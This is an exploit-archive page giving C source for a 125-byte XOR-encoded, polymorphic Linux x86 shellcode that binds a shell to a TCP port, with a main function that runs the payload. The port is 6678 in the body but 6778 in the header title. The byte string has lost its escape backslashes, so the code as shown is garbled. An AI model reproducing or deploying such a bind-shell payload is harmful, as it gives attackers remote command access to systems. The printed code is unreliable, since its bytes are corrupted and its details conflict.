[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 125 bind port to 6778 XOR encoded polymorphic linux shellcode .
# Published : 2010-07-05
# Author :
# Previous Title : OSX/Intel reverse_tcp shell x86_64 - 131 bytes
# Next Title : Linux/x86 - netcat bindshell port 6666 - 69 bytes
/*
Title : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date : Tue Jul 6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "xebx11x5ex31xc9xb1x65x80x74x0exff"
"x0ax80xe9x01x75xf6xebx05xe8xeaxff"
"xffxffx3bxcax3bxd1x3bxd8x5ax60x0b"
"x60x08x83xebxf4xc9xbax6cxc7x8ax83"
"xccx58x62xb1x08x10x70x83xebx60x1a"
"x5bx5cx83xebxf4xc9xbax6cxc7x8ax58"
"x5cx83xebxb9x0exbax6cxc7x8ax58x58"
"x5cx83xebxf4xc9xbax6cxc7x8ax83xc9"
"x3bxc3xbax35xc7x8ax4bxbax35xc7x8a"
"x4bxbax35xc7x8ax58x62x25x25x79x62"
"x62x25x68x63x64x83xe9x58x59x83xeb"
"xbax01xc7x8a";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
}